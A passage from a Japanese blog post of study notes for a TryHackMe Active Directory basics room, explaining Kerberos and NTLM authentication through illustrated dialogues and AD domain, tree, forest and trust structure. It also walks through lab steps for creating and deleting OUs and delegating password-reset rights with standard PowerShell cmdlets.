<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>今度は SPN=MSSQL/SRV に接続したいです。TGT と Session Key を使って TGS をお願いします！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="green"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/KDC-1.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/KDC-1.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">KDC</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>了解。これは TGS と Service Session Key。TGS はサービス所有者のハッシュで暗号化済みです。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>サーバさん、これが TGS とタイムスタンプです。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="yellow"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Service（サーバー）</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>TGS を私のハッシュで復号…OK！認証成功。どうぞ接続してください。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>


<p class="is-style-sticky_box">遊園地に例えてみると</p>


<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>こんにちは！この遊園地に入りたいので、チケットをください。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="green"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_KDC.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_KDC.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">KDC</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>いらっしゃいませ。身分証を確認しますね。……はい、問題なし！<br>こちらがあなたのフリーパス（TGT）です。<br>これを持っていれば、もう一度身分証を見せる必要はありませんよ。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>ジェットコースターに乗りたいんですけど、このTGTで乗れますか？</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="green"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_KDC.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_KDC.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">KDC</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>ジェットコースター専用のチケット（TGS）が必要です。<br>あなたのTGTを確認しました、はい、これが TGS（サービスチケット） です！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>ジェットコースターのチケットを持ってきました。入ってもいいですか？</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="yellow"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_server.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/遊園地_server.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Service（サーバー）</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>TGSを確認しますね……OK！あなたは正規のチケットを持っています。<br>どうぞ乗車をお楽しみください！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>


<h4 class="wp-block-heading">NTLM認証</h4>



<p>Windowsで使われる認証プロトコル（認証の仕組み）のひとつで特に古いバージョンのWindowsネットワークやファイル共有（SMB）などで利用されることがある。</p>



<p><strong>NTLMとは</strong></p>



<p>Microsoftが開発したWindows専用の認証プロトコル。<br>主にWindows NT時代（1990年代）に登場し、Active Directoryが登場する前に使われていた。<br><br>今でも以下のような場面ではNTLMが動いていることがある。<br>ドメイン外のPCが共有フォルダにアクセスする場合<br>Kerberosが利用できない古いシステムやアプリ<br>ローカル認証や一部のリモート接続（RDP）など。</p>



<p><strong>仕組み</strong></p>



<p class="is-style-sticky_box">Step 1：認証要求（Authentication Request）</p>



<p>クライアント（ユーザー）はサーバーに対して「ログインしたい」というリクエストを送る。<br>この時点では、まだパスワードやハッシュは送られない。</p>



<p class="is-style-sticky_box">Step 2：サーバーからチャレンジ（Challenge）</p>



<p>サーバーはクライアントに対して、ランダムな値（チャレンジ）を送る。<br>この値は毎回異なり、使い回し（リプレイ攻撃）を防ぐためのもの。</p>



<p class="is-style-sticky_box">Step 3：レスポンスの生成と送信（NTLM Response）</p>



<p>クライアントは自分のパスワードから生成したNTLMハッシュ（NTLM Hash）を使って、<br>サーバーから受け取ったチャレンジを暗号化。</p>



<p class="is-style-sticky_box">Step 4：サーバー→ドメインコントローラーへ送信</p>



<p>サーバーは受け取ったチャレンジとレスポンスをドメインコントローラー（DC）に転送。<br>実際のパスワード情報はDCが保持しているため、サーバー自身では判定できない。</p>



<p class="is-style-sticky_box">Step 5：ドメインコントローラーで検証</p>



<p>DCは保存してあるユーザーのNTLMハッシュを使い同じチャレンジを自分でも暗号化。<br>生成されたレスポンスがクライアントの送ったものと一致すれば認証成功。</p>



<p class="is-style-sticky_box">Step 6：認証結果をサーバーに返す</p>



<p>DCは認証結果（成功または失敗）をサーバーに返し、<br>サーバーはその結果に応じてクライアントのアクセスを許可または拒否。</p>



<p class="is-style-sticky_box">要約</p>


<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>サーバーさん、ログインしたいです！認証をお願いします！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="yellow"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Server</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>了解しました。それではこちらのチャレンジ（Challenge）をお渡しします。<br>この値を正しく処理して返してください。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>分かりました。<br>自分のパスワードから作られたNTLMハッシュを使って、<br>このチャレンジを暗号化します！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -thinking -border-none"><div class="c-balloon__text">
<p>Challenge ＋ NTLM Hash → Responseを作って&#8230;</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="blue"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/client.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Client</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>できました！これが私のレスポンス（Response）です！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="yellow"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Server</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>ありがとうございます。このChallengeとResponseをドメインコントローラー（DC）に確認してもらいますね。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="red"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/DC.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/DC.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">DC</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>なるほど…。<br>こちらでも保存しているNTLMハッシュを使って同じチャレンジを暗号化してみましょう。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="red"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/DC.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/DC.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">DC</span></div><div class="c-balloon__body -thinking -border-none"><div class="c-balloon__text">
<p>NTLM Hash + Challenge → 自分でResponseを作って&#8230;</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-left" data-col="red"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/DC.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/DC.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">DC</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>お、クライアントのResponseと一致！これは本人ですね。</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>

<div class="swell-block-balloon"><div class="c-balloon -bln-right" data-col="yellow"><div class="c-balloon__icon -square"><img decoding="async" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="lazyload c-balloon__iconImg" width="80px" height="80px"><noscript><img decoding="async" src="https://cybermemo.blog/wp-content/uploads/2025/10/server.png" alt="" class="c-balloon__iconImg" width="80px" height="80px"></noscript><span class="c-balloon__iconName">Server</span></div><div class="c-balloon__body -speaking -border-none"><div class="c-balloon__text">
<p>DCが認証OKだそうです！<br>クライアントさん、ログインを許可します。ようこそ！</p>
<span class="c-balloon__shapes"><span class="c-balloon__before"></span><span class="c-balloon__after"></span></span></div></div></div></div>


<h3 class="wp-block-heading">Active Directoryの拡張構造</h3>



<p>Active Directory（以下AD）では単一のドメインで始まった環境をツリーやフォレストとして拡張することで、大規模組織にも対応できる。</p>



<h4 class="wp-block-heading">ドメインとは</h4>



<p>ドメインはADの管理単位。<br>ユーザー、コンピュータ、サーバーなどのオブジェクトをまとめて管理できる。</p>



<h4 class="wp-block-heading">ツリー（Tree）とは</h4>



<p>例えば、企業が海外展開して「UK支社」「US支社」ができた場合、それぞれのITチームが独自に管理したい。<br>このとき、以下のようなサブドメイン構成にすることで管理を分けられる：<br><br>thm.local（ルートドメイン）<br>├─ uk.thm.local（UK支社）<br>└─ us.thm.local（US支社）<br><br>これを「ツリー構造（Domain Tree）」と呼ぶ。<br>同じ名前空間（thm.local）を共有しており、各サブドメインが独立して管理可能。</p>



<p class="is-style-big_icon_point">各ドメインには Domain Admins（ドメイン管理者）が存在<br>全体を統括できるのがEnterprise Admins（エンタープライズ管理者）<br><br>つまり：<br>UK支社の管理者 → UK内のDCを管理<br>Enterprise Admin → 全支社を統括できる</p>



<h4 class="wp-block-heading">フォレスト（Forest）とは</h4>



<p>フォレストは、異なるドメインツリーをまとめた最上位の構造。<br>例えば、会社「THM Inc.」が「MHT Inc.」を買収した場合：<br><br>🟩 <strong>フォレスト（Forest）</strong><br>　┣ 🌳 <strong>ツリー1：THM.local</strong><br>　┃　┣ 🍃 uk.thm.local<br>　┃　┗ 🍃 us.thm.local<br>　┗ 🌳 <strong>ツリー2：MHT.local</strong><br>　　　┣ 🍃 asia.mht.local<br>　　　┗ 🍃 eu.mht.local</p>



<p>この2つを同じネットワーク内で統合したものが「フォレスト（Forest）」。<br>フォレスト内では、複数のツリーが異なる名前空間でも共存できる。</p>



<h4 class="wp-block-heading">トラスト関係（Trust Relationship）とは</h4>



<p>フォレストやツリーを構成すると別ドメイン間でリソース共有が必要になる。<br>このときに必要なのが トラスト（信頼）関係 。</p>



<p><strong>一方向トラスト（One-way Trust）</strong><br>片方のドメインがもう片方のドメインを「信頼する」関係。<br>例えば：<br>THM.local → MHT.local を信頼<br><br><strong>双方向トラスト（Two-way Trust）</strong><br>お互いに信頼する関係です。<br>例えば：<br>THM.local → MHT.local を信頼<br>THM.local ← MHT.local を信頼<br><br>これにより両方のドメインのユーザーが互いのリソースにアクセス可能となる。<br>（フォレストやツリーを構築するとデフォルトで双方向トラストが形成される。）</p>



<p class="is-style-big_icon_point">トラスト関係＝自動アクセスではない。<br>トラスト関係を結んだからといって自動的に全リソースにアクセスできるわけではない。<br>トラストは「認証を認める」仕組みであり、実際のアクセス権は別途設定が必要。</p>



<h3 class="wp-block-heading">実際に動かしてみる</h3>



<h4 class="wp-block-heading">Task3 実演</h4>



<p><strong>1.OU（Organizational Units）の作成</strong></p>



<p>THM OU に「Students」を作成。</p>



<p>左ペインで THM OU を探して右クリック。<br>コンテキストメニューから新規作成(New)→組織単位 (Organizational Unit) を選択。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="686" height="674" src="https://cybermemo.blog/wp-content/uploads/2025/10/OU作成.png" alt="OU作成" class="wp-image-335" style="width:452px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/OU作成.png 686w, https://cybermemo.blog/wp-content/uploads/2025/10/OU作成-300x295.png 300w" sizes="(max-width: 686px) 100vw, 686px" /></figure>



<p>名前を「Students」と入力して OK。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="429" height="368" src="https://cybermemo.blog/wp-content/uploads/2025/10/Students作成.png" alt="Students作成" class="wp-image-336" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Students作成.png 429w, https://cybermemo.blog/wp-content/uploads/2025/10/Students作成-300x257.png 300w" sizes="(max-width: 429px) 100vw, 429px" /></figure>



<h4 class="wp-block-heading">Task4 実演</h4>



<p><strong>1.不要なOUの削除</strong><br>シナリオ：ある部門が予算削減のために閉鎖された。<a href="https://tryhackme.com/room/winadbasics" data-type="link" data-id="https://tryhackme.com/room/winadbasics">ルーム</a> Task4 のチャートを確認して、不要な部門を削除する。</p>



<p>1-1.OUは誤って削除されないようにデフォルトで保護がかかっているので、まずはプロパティから保護を解除する。</p>



<p>現状では削除しようとしてもエラーになる。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="395" height="152" src="https://cybermemo.blog/wp-content/uploads/2025/10/OU削除.png" alt="OU削除エラー" class="wp-image-343" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/OU削除.png 395w, https://cybermemo.blog/wp-content/uploads/2025/10/OU削除-300x115.png 300w" sizes="(max-width: 395px) 100vw, 395px" /></figure>



<p>表示(View)→Advanced Features(高度な機能)</p>



<figure class="wp-block-image size-full"><img decoding="async" width="513" height="303" src="https://cybermemo.blog/wp-content/uploads/2025/10/Advanced-Features.png" alt="Advanced Features" class="wp-image-337" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Advanced-Features.png 513w, https://cybermemo.blog/wp-content/uploads/2025/10/Advanced-Features-300x177.png 300w" sizes="(max-width: 513px) 100vw, 513px" /></figure>



<p>プロパティ(Properties)→オブジェクト(Object)→オブジェクトを誤削除から保護する(Protect object from accidental )deletion のチェックを外す。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="492" height="730" src="https://cybermemo.blog/wp-content/uploads/2025/10/プロパティ-1.png" alt="プロパティ" class="wp-image-340" style="width:346px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/プロパティ-1.png 492w, https://cybermemo.blog/wp-content/uploads/2025/10/プロパティ-1-202x300.png 202w" sizes="(max-width: 492px) 100vw, 492px" /></figure>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="395" height="452" src="https://cybermemo.blog/wp-content/uploads/2025/10/プロテクト解除-1.png" alt="プロテクト解除" class="wp-image-341" style="width:351px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/プロテクト解除-1.png 395w, https://cybermemo.blog/wp-content/uploads/2025/10/プロテクト解除-1-262x300.png 262w" sizes="(max-width: 395px) 100vw, 395px" /></figure>



<p>1-2.保護が外れたのでOUを削除。</p>



<p>保護が外れているので削除確認画面が表示される。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="477" height="638" src="https://cybermemo.blog/wp-content/uploads/2025/10/OU削除1.png" alt="OU削除" class="wp-image-344" style="width:374px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/OU削除1.png 477w, https://cybermemo.blog/wp-content/uploads/2025/10/OU削除1-224x300.png 224w" sizes="(max-width: 477px) 100vw, 477px" /></figure>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="375" height="297" src="https://cybermemo.blog/wp-content/uploads/2025/10/OU削除2.png" alt="OU削除確認画面" class="wp-image-345" style="width:362px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/OU削除2.png 375w, https://cybermemo.blog/wp-content/uploads/2025/10/OU削除2-300x238.png 300w" sizes="(max-width: 375px) 100vw, 375px" /></figure>



<p><strong>2.委任</strong><br>シナリオ：ITサポート担当者の「Phillip」に「Sales」、「Marketing」、「Management」のパスワードリセット権限を付与する。<br>※今回は「Sales」のみ実演。</p>



<p>2-1.&nbsp;「制御の委任(Delegate Control)」から「Phillip」にパスワードリセット権限を付与する。</p>



<p>&nbsp;OUを右クリックして制御の委任(Delegate Control)。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="495" height="716" src="https://cybermemo.blog/wp-content/uploads/2025/10/委任.png" alt="制御の委任(Delegate Control)" class="wp-image-347" style="width:330px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/委任.png 495w, https://cybermemo.blog/wp-content/uploads/2025/10/委任-207x300.png 207w" sizes="(max-width: 495px) 100vw, 495px" /></figure>



<p>「Add」→「Phillip」と入力して「名前の確認(Check Names)」をクリック→OK→Next</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="491" height="381" src="https://cybermemo.blog/wp-content/uploads/2025/10/委任5-1.png" alt="ユーザー名を追加" class="wp-image-353" style="width:491px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/委任5-1.png 491w, https://cybermemo.blog/wp-content/uploads/2025/10/委任5-1-300x233.png 300w" sizes="(max-width: 491px) 100vw, 491px" /></figure>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="452" height="243" src="https://cybermemo.blog/wp-content/uploads/2025/10/委任6-1.png" alt="ユーザー名を追加、名前の確認" class="wp-image-355" style="width:495px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/委任6-1.png 452w, https://cybermemo.blog/wp-content/uploads/2025/10/委任6-1-300x161.png 300w" sizes="(max-width: 452px) 100vw, 452px" /></figure>



<figure class="wp-block-image size-full"><img decoding="async" width="494" height="386" src="https://cybermemo.blog/wp-content/uploads/2025/10/委任2-1.png" alt="次へ" class="wp-image-349" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/委任2-1.png 494w, https://cybermemo.blog/wp-content/uploads/2025/10/委任2-1-300x234.png 300w" sizes="(max-width: 494px) 100vw, 494px" /></figure>



<p>「ユーザーのパスワードをリセットし、次回ログオン時にパスワード変更を強制する(Reset user passwords and force password change at next logon)」にチェックを入れ、Next。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="493" height="382" src="https://cybermemo.blog/wp-content/uploads/2025/10/委任7.png" alt="パスワードリセット権限付与" class="wp-image-356" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/委任7.png 493w, https://cybermemo.blog/wp-content/uploads/2025/10/委任7-300x232.png 300w" sizes="(max-width: 493px) 100vw, 493px" /></figure>



<p>2-2. 「Phillip」でログインし、Sales 部門のユーザー「Sophie」のパスワードリセットを実行する。</p>



<p>まずは、「Phillip」でログイン。</p>



<pre class="wp-block-code"><code>xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'</code></pre>



<p>PowerShell からパスワード変更。<br>※7文字以上、大文字・小文字・数字・記号を混ぜたパスワード推奨。簡単すぎるとエラーになる。</p>



<pre class="wp-block-code"><code>PS C:\Users\phillip&gt; Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

New Password: **********

VERBOSE: Performing the operation "Set-ADAccountPassword" on target "CN=Sophie,OU=Sales,OU=THM,DC=thm,DC=local".</code></pre>



<p>一緒にパスワードの強制リセットも設定。次回ログイン時にパスワード変更が必須になる。</p>



<pre class="wp-block-code"><code>PS C:\Users\phillip&gt; Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose

VERBOSE: Performing the operation "Set" on target "CN=Sophie,OU=Sales,OU=THM,DC=thm,DC=local".</code></pre>



<p>2-3.「Sophie」でログインし、フラグを取得。</p>



<p>まずは、「Sophie」でRDPログイン。</p>



<pre class="wp-block-code"><code>xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'</code></pre>



<p>パスワードの強制リセットが反映されている。任意のパスワードを設定し、ログイン。</p>



